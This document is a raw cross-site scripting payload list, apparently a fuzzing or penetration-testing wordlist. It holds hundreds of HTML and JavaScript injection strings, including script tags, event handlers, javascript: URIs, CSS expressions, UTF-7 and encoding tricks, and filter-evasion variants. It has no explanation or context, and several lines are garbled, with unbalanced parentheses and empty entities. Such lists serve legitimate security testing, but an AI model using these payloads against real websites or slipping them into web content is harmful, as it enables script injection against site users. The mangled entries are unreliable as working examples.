<a href="jav&#65ascript:javascript:alert(467)">test467</a>
<a href="jav&#97ascript:javascript:alert(468)">test468</a>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(470)&amp;gt;>">
';alert(471))//';alert())//";
alert())//";alert(472))//--
></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT>
<IMG SRC="javascript:alert(476);">
<IMG SRC=javascript:alert()>
<IMG SRC=JaVaScRiPt:alert()>
<IMG SRC=javascript:alert()>
<IMG SRC=`javascript:alert()`>
<a onmouseover="alert(481)">xxs link</a>
<a onmouseover=alert()>xxs link</a>
<IMG """><SCRIPT>alert(483)</SCRIPT>">
<IMG SRC=javascript:alert())>
<IMG SRC=# onmouseover="alert(485)">
<IMG SRC= onmouseover="alert(486)">
<IMG onmouseover="alert(487)">
<IMG SRC="jav ascript:alert(491);">
<IMG SRC="jav ascript:alert(492);">
<IMG SRC="jav ascript:alert(493);">
<IMG SRC="jav ascript:alert(494);">
perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out
<IMG SRC=" &#14; javascript:alert(496);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>
<<SCRIPT>alert();//<</SCRIPT>
<IMG SRC="javascript:alert(503)"
\";alert(505);//
</TITLE><SCRIPT>alert();</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(507);">
<BODY BACKGROUND="javascript:alert(508)">
<IMG DYNSRC="javascript:alert(509)">
<IMG LOWSRC="javascript:alert(510)">
<STYLE>li {list-style-image: url("javascript:alert(511)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert()>
<BGSOUND SRC="javascript:alert(515);">
<BR SIZE="&{alert(516)}">
<LINK REL="stylesheet" HREF="javascript:alert(517);">
<STYLE>@im\port'\ja\vasc\ript:alert(522)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(523))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert())'>
<STYLE TYPE="text/javascript">alert();</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(526)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(527)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(528)")}</STYLE>
<XSS STYLE="xss:expression(alert(529))">
¼script¾alert()¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(532);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(534);">
<IFRAME SRC="javascript:alert(535);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(536)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(537);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(538)">
<TABLE><TD BACKGROUND="javascript:alert(539)">
<DIV STYLE="background-image: url(javascript:alert(540))">
<DIV STYLE="background-image: url(&#1;javascript:alert(542))">
<DIV STYLE="width: expression(alert(543));">
<BASE HREF="javascript:alert(544);//">
<? echo('<SCR)';echo('IPT>alert(549)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(552)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert();+ADw-/SCRIPT+AD4-
<img src=`%`&NewLine; onerror=alert()&NewLine;
<script /*%00*/>/*%00*/alert()/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg &#579579579;&#5795790;load=alert(579)>">
<meta content="&NewLine; 580 &NewLine;; JAVASCRIPT&colon; alert(580)" http-equiv="refresh"/>
<form><iframe &#;&#;&#; src="javascript:alert(588)"&#;&#;&#;;>
http://www.google<script .com>alert(590)</script
<script ^__^>alert())</script ^__^
</style &#;><script &#; :-(>/**/alert()/**/</script &#; :-(
&#;</form><input type&#;"date" onfocus="alert(596)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert()&NewLine;>X</a>
<script ~~~>alert()</script ~~~>
<iframe/%/ src=javaSCRIPT&colon;alert()
<%<!--'%><script>alert(626);</script -->
<script src="data:text/javascript,alert(627)"></script>
<iframe/onreadystatechange=alert()
<svg/onload=alert()
<input type="text" value=`` <div/onmouseover='alert(632)'>X</div>
http://www.<script>alert(633)</script .com
<svg><script ?>alert()
<img src=`xx:xx`onerror=alert()>
<meta http-equiv="refresh" content="0;javascript&colon;alert(639)"/>
<script>+-+--+-+alert()</script>
<body/onload=&lt;!--&gt;&#6500alert()>
<script itworksinallbrowsers>/*<script* */alert()</script
<img src ?itworksonchrome?\/onerror = alert()
<svg><script onlypossibleinopera:-)> alert()
<script x> alert() </script =
<div/onmouseover='alert(657)'> style="x:">
<--`<img/src=` onerror=alert()> --!>
<div style="position:absolute;top:0;left:0;width:66000%;height:66000%" onmouseover="prompt(660)" onclick="alert(660)">x</button>
<form><button formaction=javascript&colon;alert()>CLICKME
‘; alert();
‘)alert();//
<ScRiPt>alert()</sCriPt>
<IMG SRC=jAVasCrIPt:alert()>
<IMG SRC=”javascript:alert();”>
<IMG SRC=javascript:alert()>
<IMG SRC=javascript:alert()>
<img src=xss onerror=alert()>
<img src=`%`&NewLine; onerror=alert()&NewLine;
<script /*%00*/>/*%00*/alert()/*%00*/</script /*%00*/
<iframe/src="data:text/html,<svg &#687687687;&#6876870;load=alert(687)>">
<meta content="&NewLine; 688 &NewLine;; JAVASCRIPT&colon; alert(688)" http-equiv="refresh"/>
<form><iframe &#;&#;&#; src="javascript:alert(696)"&#;&#;&#;;>
http://www.google<script .com>alert(698)</script
<script ^__^>alert())</script ^__^
</style &#;><script &#; :-(>/**/alert()/**/</script &#; :-(
&#;</form><input type&#;"date" onfocus="alert(704)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert()&NewLine;>X</a>
<script ~~~>alert()</script ~~~>
<iframe/%/ src=javaSCRIPT&colon;alert()
<%<!--'%><script>alert(734);</script -->
<script src="data:text/javascript,alert(735)"></script>
<iframe/onreadystatechange=alert()
<svg/onload=alert()
<input type="text" value=`` <div/onmouseover='alert(740)'>X</div>
http://www.<script>alert(741)</script .com
<svg><script ?>alert()
<img src=`xx:xx`onerror=alert()>
<meta http-equiv="refresh" content="0;javascript&colon;alert(746)"/>
<script>+-+--+-+alert()</script>
<body/onload=&lt;!--&gt;&#7570alert()>
<script itworksinallbrowsers>/*<script* */alert()</script
<img src ?itworksonchrome?\/onerror = alert()
<svg><script onlypossibleinopera:-)> alert()
<script x> alert() </script =
<div/onmouseover='alert(764)'> style="x:">
<--`<img/src=` onerror=alert()> --!>
<div style="xg-p:absolute;top:0;left:0;width:76700%;height:76700%" onmouseover="prompt(767)" onclick="alert(767)">x</button>
<form><button formaction=javascript&colon;alert()>CLICKME
‘;alert())//’;alert(775))//”;alert(775))//”;alert(775))//–></SCRIPT>”>’><SCRIPT>alert(775))</SCRIPT>
<IMG “””><SCRIPT>alert()</SCRIPT>”>
<IMG SRC=javascript:alert())>
<IMG SRC=”jav ascript:alert();”>
<IMG SRC=”jav ascript:alert();”>
<<SCRIPT>alert();//<</SCRIPT>
%253cscript%253ealert()%253c/script%253e
“><s”%2b”cript>alert()</script>
foo<script>alert()</script>
<scr<script>ipt>alert()</scr</script>ipt>
<BODY BACKGROUND=”javascript:alert()”>
<BODY ONLOAD=alert()>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert();”>
<IMG SRC=”javascript:alert()”
javascript:alert()
<img src="javascript:alert(794);">
<img src=javascript:alert()>
<"';alert(796))//\';alert(796))//";alert())//\";alert(796))//--></SCRIPT>">'><SCRIPT>alert(796))</SCRIPT>
<IFRAME SRC="javascript:alert(798);"></IFRAME>
<<SCRIPT>alert();//<</SCRIPT>
<"';alert(806))//\';alert(806))//";alert())//\";alert(806))//--></SCRIPT>">'><SCRIPT>alert(806))</SCRIPT>
';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//--></SCRIPT>">'><SCRIPT>alert())<?/SCRIPT>&submit.x=&submit.y=&cmd=search
<script>alert()</script>&safe=high&cx=:su_tzknyxug&cof=FORID:#
<script>alert();</script>&search=
&q=';alert(810))//\';alert%2?8810))//";alert(String.fromCharCode?(88,83,83))//\";alert(810)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(,%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<BODY ONLOAD=alert()>
<body onscroll=alert()><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(816)">lol
<!--<img src="--><img src=x onerror=alert(817)//">
<![><img src="]><img src=x onerror=alert(818)//">
<style><img src="</style><img src=x onerror=alert(819)//">
<? foo="><script>alert(820)</script>">
<! foo="><script>alert(821)</script>">
</ foo="><script>alert(822)</script>">
<? foo="><x foo='?><script>alert(823)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(824)</script>">
<% foo><x foo="%><script>alert(825)</script>">
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert()</script></svg>
&lt;SCRIPT&gt;alert()&lt;/SCRIPT&gt;
\\";alert(831);//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;
&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(833);\"&gt;
&lt;BODY BACKGROUND=\"javascript:alert(834)\"&gt;
&lt;BODY ONLOAD=alert()&gt;
&lt;IMG DYNSRC=\"javascript:alert(836)\"&gt;
&lt;IMG LOWSRC=\"javascript:alert(837)\"&gt;
&lt;BGSOUND SRC=\"javascript:alert(838);\"&gt;
&lt;BR SIZE=\"&{alert(839)}\"&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"javascript:alert(841);\"&gt;
&lt;STYLE&gt;li {list-style-image&#; url(\"javascript:alert(847)\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
žscriptualert()ž/scriptu
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(852);\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(854);\"
&lt;IFRAME SRC=\"javascript:alert(855);\"&gt;&lt;/IFRAME&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript:alert(856);\"&gt;&lt;/FRAMESET&gt;
&lt;TABLE BACKGROUND=\"javascript:alert(857)\"&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript:alert(858)\"&gt;
&lt;DIV STYLE=\"background-image: url(javascript:alert(859))\"&gt;
&lt;DIV STYLE=\"background-image: url(javascript:alert(861))\"&gt;
&lt;DIV STYLE=\"width: expression(alert(862));\"&gt;
&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(863)';&lt;/STYLE&gt;
&lt;IMG STYLE=\"xss:expr/*XSS*/ession(alert(864))\"&gt;
&lt;XSS STYLE=\"xss:expression(alert(865))\"&gt;
xss&#;ex/*XSS*//*/*/pression(alert(867))'&gt;
&lt;STYLE TYPE=\"text/javascript\"&gt;alert(868);&lt;/STYLE&gt;
&lt;STYLE&gt;&#;XSS{background-image&#;url(\"javascript:alert(869)\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=\"text/css\"&gt;BODY{background:url(\"javascript:alert(870)\")}&lt;/STYLE&gt;
&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;
&lt;BASE HREF=\"javascript:alert(874);//\"&gt;
&lt;OBJECT classid=clsid&#;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#;alert()&gt;&lt;/OBJECT&gt;
d=\"alert(882);\\")\";
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#;CDATA&#;&lt;IMG SRC=\"javas]]&gt;&lt;![CDATA[cript:alert(885);\"&gt;]]&gt;
&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript:alert(887)\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;t&#;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(894)&lt;/SCRIPT&gt;\"&gt;
echo('IPT&gt;alert(899)&lt;/SCRIPT&gt;'); ?&gt;
&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert(902)&lt;/SCRIPT&gt;\"&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(903);+ADw-/SCRIPT+AD4-
&lt;IMG SRC=\"javascript:alert(991)\"
&lt;&lt;SCRIPT&gt;alert();//&lt;&lt;/SCRIPT&gt;
&lt;BODY onload!#$%&()*~+-_&#;,&#;;?@&#;/|\&#;^`=alert()&gt;
&lt;IMG SRC=\" javascript:alert(998);\"&gt;
perl -e 'print \"&lt;SCR\0IPT&gt;alert(999)&lt;/SCR\0IPT&gt;\";' &gt; out
perl -e 'print \"&lt;IMG SRC=java\0script:alert(1000)&gt;\";' &gt; out
&lt;IMG SRC=\"jav ascript:alert(1001);\"&gt;
&lt;IMG SRC=\"jav ascript:alert(1002);\"&gt;
&lt;IMG SRC=\"jav ascript:alert(1003);\"&gt;
&lt;IMG SRC=javascript&#;alert()&gt;
&lt;IMG SRC=javascript&#;alert())&gt;
&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(1008)&lt;/SCRIPT&gt;\"&gt;
&lt;IMG SRC=`javascript&#;alert()`&gt;
&lt;IMG SRC=javascript&#;alert()&gt;
&lt;IMG SRC=JaVaScRiPt&#;alert()&gt;
&lt;IMG SRC=javascript&#;alert()&gt;
&lt;IMG SRC=\"javascript:alert(1013);\"&gt;
';alert(1016))//\';alert(1016))//\";alert(1016))//\\";alert(1016))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert())&lt;/SCRIPT&gt;
';alert(1017))//\';alert(1017))//";alert(1017))//\";alert(1017))//--></SCRIPT>">'><SCRIPT>alert())</SCRIPT>
<IMG SRC="javascript:alert(1020);">
<IMG SRC=javascript:alert()>
<IMG SRC=javascrscriptipt:alert()>
<IMG SRC=JaVaScRiPt:alert()>
<IMG """><SCRIPT>alert(1024)</SCRIPT>">
<IMG SRC=" &#14; javascript:alert(1025);">
<<SCRIPT>alert();//<</SCRIPT>
<SCRIPT>a=/XSS/alert()</SCRIPT>
\";alert(1030);//
</TITLE><SCRIPT>alert();</SCRIPT>
¼script¾alert()¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1033);">
<IFRAME SRC="javascript:alert(1034);"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1035);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1036)">
<TABLE><TD BACKGROUND="javascript:alert(1037)">
<DIV STYLE="background-image: url(javascript:alert(1038))">
<DIV STYLE="width: expression(alert(1040));">
<STYLE>@im\port'\ja\vasc\ript:alert(1041)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1042))">
<XSS STYLE="xss:expression(alert(1043))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert())'>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(1048)&lt;/SCRIPT&gt;"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:alert(1050)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(1051)">crosssitespt
<frameset onload=alert()>
<!--<img src="--><img src=x onerror=alert(1053)//">
<style><img src="</style><img src=x onerror=alert(1054)//">
<embed src="javascript:alert(1057)">
<? foo="><script>alert(1058)</script>">
<! foo="><script>alert(1059)</script>">
</ foo="><script>alert(1060)</script>">
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert()}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][].constructor._('alert(1063)')()</script>
<script src="#">{alert()}</script>;
<script>crypto.generateCRMFRequest('CN=0',,,null,'alert(1065)',,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert()</script></svg>
<svg onload="javascript:alert(1067)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1068)"></iframe>
+ADw-script+AD4-alert()+ADw-/script+AD4-
%2BADw-script+AD4-alert()%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert()+ADw-/script+AD4APAAi-
%253cscript%253ealert()%253c/script%253e
“><s”%2b”cript>alert()</script>
“><ScRiPt>alert()</script>
“><<script>alert();//<</script>
foo<script>alert()</script>
<scr<script>ipt>alert()</scr</script>ipt>
‘; alert(); var foo=’
foo\’; alert();//’;
</script><script >alert()</script>
<img src=asdf onerror=alert()>
<BODY ONLOAD=alert()>
<script>alert()</script>
"><script>alert(1086))</script>
<video src= onerror=alert()>
<audio src= onerror=alert()>
';alert(1089))//';alert())//";alert(1089))//";alert(1089))//--></SCRIPT>">'><SCRIPT>alert(1089))</SCRIPT>
\"autofocus/onfocus=alert(1091)--><video/poster/onerror=prompt(2)>"-confirm()-"
<IMG SRC="javascript:alert(1097);">
<IMG SRC=javascript:alert()>
<IMG SRC=JaVaScRiPt:alert()>
<IMG SRC=javascript:alert()>
<IMG SRC=`javascript:alert()`>
<a onmouseover="alert(1102)">xxs link</a>
<a onmouseover=alert()>xxs link</a>
<IMG """><SCRIPT>alert(1104)</SCRIPT>">
<IMG SRC=javascript:alert())>
<IMG SRC=# onmouseover="alert(1106)">
<IMG SRC= onmouseover="alert(1107)">
<IMG onmouseover="alert(1108)">
<IMG SRC=/ onerror="alert(1109))"></img>
<IMG SRC="jav ascript:alert(1115);">
<IMG SRC="jav ascript:alert(1116);">
<IMG SRC="jav ascript:alert(1117);">
<IMG SRC="jav ascript:alert(1118);">
<IMG SRC=" &#14; javascript:alert(1119);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>
<<SCRIPT>alert();//<</SCRIPT>
<IMG SRC="javascript:alert(1126)"
\";alert(1128);//
</script><script>alert();</script>
</TITLE><SCRIPT>alert();</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1131);">
<BODY BACKGROUND="javascript:alert(1132)">
<IMG DYNSRC="javascript:alert(1133)">
<IMG LOWSRC="javascript:alert(1134)">
<STYLE>li {list-style-image: url("javascript:alert(1135)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert()>
<BGSOUND SRC="javascript:alert(1139);">
<BR SIZE="&{alert(1140)}">
<LINK REL="stylesheet" HREF="javascript:alert(1141);">
<STYLE>@im\port'\ja\vasc\ript:alert(1146)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1147))">
xss:ex/*XSS*//*/*/pression(alert())'>
<STYLE TYPE="text/javascript">alert();</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1151)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1152)")}</STYLE>
<XSS STYLE="xss:expression(alert(1153))">
¼script¾alert()¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1156);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1158);">
<IFRAME SRC="javascript:alert(1159);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1160)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1161);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1162)">
<TABLE><TD BACKGROUND="javascript:alert(1163)">
<DIV STYLE="background-image: url(javascript:alert(1164))">
<DIV STYLE="background-image: url(&#1;javascript:alert(1166))">
<DIV STYLE="width: expression(alert(1167));">
<!--[if gte IE ]><SCRIPT>alert();</SCRIPT><![endif]-->
<BASE HREF="javascript:alert(1169);//">
<? echo('<SCR)';echo('IPT>alert(1172)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1174)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert();+ADw-/SCRIPT+AD4-
\"autofocus/onfocus=alert(1184)--><video/poster/ error=prompt(2)>"-confirm()-"
veris-->group<svg/onload=alert()//
#"><img src=M onerror=alert(1186);>
element[attribute='<img src=x onerror=alert(1187);>
[<blockquote cite="]">[" onmouseover="alert();" ]
<scr<script>ipt>alert()</scr</script>ipt><scr<script>ipt>alert()</scr</script>ipt>
<sCR<script>iPt>alert()</SCr</script>IPt>
%253Cscript%253Ealert()%253C%252Fscript%253E
<IMG SRC=x onload="alert(1199))">
<IMG SRC=x onafterprint="alert(1200))">
<IMG SRC=x onbeforeprint="alert(1201))">
<IMG SRC=x onbeforeunload="alert(1202))">
<IMG SRC=x onerror="alert(1203))">
<IMG SRC=x onhashchange="alert(1204))">
<IMG SRC=x onload="alert(1205))">
<IMG SRC=x onmessage="alert(1206))">
<IMG SRC=x ononline="alert(1207))">
<IMG SRC=x onoffline="alert(1208))">
<IMG SRC=x onpagehide="alert(1209))">
<IMG SRC=x onpageshow="alert(1210))">
<IMG SRC=x onpopstate="alert(1211))">
<IMG SRC=x onresize="alert(1212))">
<IMG SRC=x onstorage="alert(1213))">
<IMG SRC=x onunload="alert(1214))">
<IMG SRC=x onblur="alert(1215))">
<IMG SRC=x onchange="alert(1216))">
<IMG SRC=x oncontextmenu="alert(1217))">
<IMG SRC=x oninput="alert(1218))">
<IMG SRC=x oninvalid="alert(1219))">
<IMG SRC=x onreset="alert(1220))">
<IMG SRC=x onsearch="alert(1221))">
<IMG SRC=x onselect="alert(1222))">
<IMG SRC=x onsubmit="alert(1223))">
<IMG SRC=x onkeydown="alert(1224))">
<IMG SRC=x onkeypress="alert(1225))">
<IMG SRC=x onkeyup="alert(1226))">
<IMG SRC=x onclick="alert(1227))">
<IMG SRC=x ondblclick="alert(1228))">
<IMG SRC=x onmousedown="alert(1229))">
<IMG SRC=x onmousemove="alert(1230))">
<IMG SRC=x onmouseout="alert(1231))">
<IMG SRC=x onmouseover="alert(1232))">
<IMG SRC=x onmouseup="alert(1233))">
<IMG SRC=x onmousewheel="alert(1234))">
<IMG SRC=x onwheel="alert(1235))">
<IMG SRC=x ondrag="alert(1236))">
<IMG SRC=x ondragend="alert(1237))">
<IMG SRC=x ondragenter="alert(1238))">
<IMG SRC=x ondragleave="alert(1239))">
<IMG SRC=x ondragover="alert(1240))">
<IMG SRC=x ondragstart="alert(1241))">
<IMG SRC=x ondrop="alert(1242))">
<IMG SRC=x onscroll="alert(1243))">
<IMG SRC=x oncopy="alert(1244))">
<IMG SRC=x oncut="alert(1245))">
<IMG SRC=x onpaste="alert(1246))">
<IMG SRC=x onabort="alert(1247))">
<IMG SRC=x oncanplay="alert(1248))">
<IMG SRC=x oncanplaythrough="alert(1249))">
<IMG SRC=x oncuechange="alert(1250))">
<IMG SRC=x ondurationchange="alert(1251))">
<IMG SRC=x onemptied="alert(1252))">
<IMG SRC=x onended="alert(1253))">
<IMG SRC=x onerror="alert(1254))">
<IMG SRC=x onloadeddata="alert(1255))">
<IMG SRC=x onloadedmetadata="alert(1256))">
<IMG SRC=x onloadstart="alert(1257))">
<IMG SRC=x onpause="alert(1258))">
<IMG SRC=x onplay="alert(1259))">
<IMG SRC=x onplaying="alert(1260))">
<IMG SRC=x onprogress="alert(1261))">
<IMG SRC=x onratechange="alert(1262))">
<IMG SRC=x onseeked="alert(1263))">
<IMG SRC=x onseeking="alert(1264))">
<IMG SRC=x onstalled="alert(1265))">
<IMG SRC=x onsuspend="alert(1266))">
<IMG SRC=x ontimeupdate="alert(1267))">
<IMG SRC=x onvolumechange="alert(1268))">
<IMG SRC=x onwaiting="alert(1269))">
<IMG SRC=x onshow="alert(1270))">
<IMG SRC=x ontoggle="alert(1271))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1272)";
<IMG SRC=x onload="alert(1273))">
<INPUT TYPE="BUTTON" action="alert(1274)"/>
"><h1><IFRAME SRC="javascript:alert();"></IFRAME>"></h1>
"><h1><IFRAME SRC=# onmouseover="alert()"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1277);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1278)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert()"></IFRAME>123</h1>
"></iframe><script>alert(1280);</script><iframe frameborder="%EF%BB%BF
"><h1><IFRAME width="" height="" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1281)"></IFRAME>123</h1>
<IFRAME width="" height="" frameborder="" onload="alert(1285)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert();"></IFRAME>"></h1>
"><h1><IFRAME SRC=# onmouseover="alert()"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert(1289);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1290)"></IFRAME>
<img src=``&NewLine; onerror=alert()&NewLine;
<script /**/>/**/alert()/**/</script /**/
<iframe/src="data:text/html,<svg &#130313031303;&#130313030;load=alert(1303)>">
<meta content="&NewLine; 1304 &NewLine;; JAVASCRIPT&colon; alert(1304)" http-equiv="refresh"/>
<form><iframe &#;&#;&#; src="javascript:alert(1311)"&#;&#;&#;;>
http://www.google<script .com>alert(1313)</script
<script ^__^>alert())</script ^__^
</style &#;><script &#; :-(>/**/alert()/**/</script &#; :-(
&#;</form><input type&#;"date" onfocus="alert(1319)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert()&NewLine;>X</a>
<script ~~~>alert()</script ~~~>
<iframe// src=javaSCRIPT&colon;alert(1332)
<%<!--'%><script>alert(1349);</script -->
<script src="data:text/javascript,alert(1350)"></script>
<iframe/onreadystatechange=alert()
<svg/onload=alert()
<input type="text" value=`` <div/onmouseover='alert(1355)'>X</div>
http://www.<script>alert(1356)</script .com
<svg><script ?>alert()
<img src=`xx:xx`onerror=alert()>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1362)"/>
<script>+-+--+-+alert()</script>
<body/onload=&lt;!--&gt;&#13730alert()>
<script itworksinallbrowsers>/*<script* */alert()</script
<img src ?itworksonchrome?\/onerror = alert()
<svg><script onlypossibleinopera:-)> alert()
<script x> alert() </script =
<div/onmouseover='alert(1380)'> style="x:">
<--`<img/src=` onerror=alert()> --!>
<div style="position:absolute;top:0;left:0;width:138300%;height:138300%" onmouseover="prompt(1383)" onclick="alert(1383)">x</button>
<form><button formaction=javascript&colon;alert()>CLICKME
<script\x20type="text/javascript">javascript:alert();</script>
<script\x3Etype="text/javascript">javascript:alert();</script>
<script\x0Dtype="text/javascript">javascript:alert();</script>
<script\x09type="text/javascript">javascript:alert();</script>
<script\x0Ctype="text/javascript">javascript:alert();</script>
<script\x2Ftype="text/javascript">javascript:alert();</script>
<script\x0Atype="text/javascript">javascript:alert();</script>
'`"><\x3Cscript>javascript:alert(1397)</script>
'`"><\x00script>javascript:alert(1398)</script>
<img src= href= onerror="javascript:alert(1399)"></img>
<audio src= href= onerror="javascript:alert(1400)"></audio>
<video src= href= onerror="javascript:alert(1401)"></video>
<body src= href= onerror="javascript:alert(1402)"></body>
<image src= href= onerror="javascript:alert(1403)"></image>
<object src= href= onerror="javascript:alert(1404)"></object>
<script src= href= onerror="javascript:alert(1405)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1406)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1407)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1408)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1409)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1410)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1411)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1412)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1413)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1414)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1415)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1416)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1417)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1418)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1419)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1420)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1421)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1422)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1423)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1424)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1425)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1426)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1427)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1428)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1429)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1430)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1431)"></html onMouseOver>
